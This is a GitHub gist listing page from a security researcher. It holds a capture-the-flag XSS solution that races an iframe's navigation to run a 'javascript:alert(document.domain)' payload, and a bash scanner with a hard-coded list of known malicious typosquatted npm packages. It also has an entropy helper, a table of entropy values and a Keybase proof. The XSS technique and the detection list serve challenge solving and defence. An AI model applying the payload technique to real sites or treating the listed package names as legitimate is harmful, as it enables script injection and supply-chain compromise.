Skip to content

Instantly share code, notes, and snippets.

View radekk's full-sized avatar

radekk

View GitHub Profile
@radekk
radekk / rc.html
Created November 25, 2019 11:33
Intigriti XSS challenge solution 11.2019 - Race Condition
<html>
<body>
<iframe id="ifr"></iframe>
<script>
var ifr = document.getElementById('ifr');
ifr.src = 'https://challenge.intigriti.io/#https://intigriti.io';
ifr.onload = () => {
setTimeout(() => {
ifr.src = 'https://challenge.intigriti.io/#javascript:alert(document.domain)';
@radekk
radekk / detect.malicious.npm.sh
Last active April 27, 2020 04:43
Detect malicious npm packages published by ~hacktask account
#!/bin/bash
# Author: @radekk
# List of vulnerable packages is from https://twitter.com/iamakulov/status/892485192883073024
# ----------------------
_IFS=$IFS
_COUNTER=0
_COUNTER_ALL=0
_SCAN_PATH=${1:-~/}
_VULN_PACKAGES="babelcli crossenv cross-env.js d3.js fabric-js ffmepg gruntcli http-proxy.js jquery.js mariadb mongose mssql.js mssql-node mysqljs nodecaffe nodefabric node-fabric nodeffmpeg nodemailer-js nodemailer.js nodemssql node-opencv node-opensl node-openssl noderequest nodesass nodesqlite node-sqlite node-tkinter opencv.js openssl.js proxy.js shadowsock smb sqlite.js sqliter sqlserver tkinter"
_REGEXP="(babelcli|crossenv|cross-env\.js|d3\.js|fabric-js|ffmepg|gruntcli|http-proxy\.js|jquery\.js|mariadb|mongose|mssql\.js|nodecaffe|nodefabric|node-fabric|nodeffmpeg|nodemailer-js|nodemailer\.js|nodemssql|node-opencv|node-opensl|node-openssl|noderequest|nodesass|nodesqlite|node-sqlite|node-tkinter|opencv\.js|openssl\.js|proxy\.js|shadowsock|smb|sqlite\.js|sqliter|sqlserver|tkinter)"
@radekk
radekk / entropy.js
Created June 7, 2017 18:16
Calculating Shannon's entropy with JavaScript
/**
* Calculate Shannon's entropy for a string
*/
module.exports = (str) => {
const set = {};
str.split('').forEach(
c => (set[c] ? set[c]++ : (set[c] = 1))
);
@radekk
radekk / entropy.table.txt
Created June 7, 2017 17:50
Shannon's entropy for sample strings
╔════════════════════════════════════════════╦═════════╗
║ String ║ Entropy ║
╠════════════════════════════════════════════╬═════════╣
║ john.doe+test@example.com ║ 3.8937 ║
║ https://auth0.com/this-is-test-url-4575812 ║ 4.2728 ║
║ THIS_IS_NOT_A_SECRET_ONLY_A_PROPERTY_KEY ║ 3.6464 ║
║ /etc/init.d/rc4/script.sh ║ 3.5133 ║
║ button[value="test1337"] ║ 3.9183 ║
╚════════════════════════════════════════════╩═════════╝
@radekk
radekk / keybase.md
Last active November 16, 2017 15:21

Keybase proof

I hereby claim:

  • I am radekk on github.
  • I am radekk (https://keybase.io/radekk) on keybase.
  • I have a public key ASDTZzfkj8mjeJ6ZLTm-fWU9dLhJY2EpTMjShIcw9Cjz-go

To claim this, I am signing this object: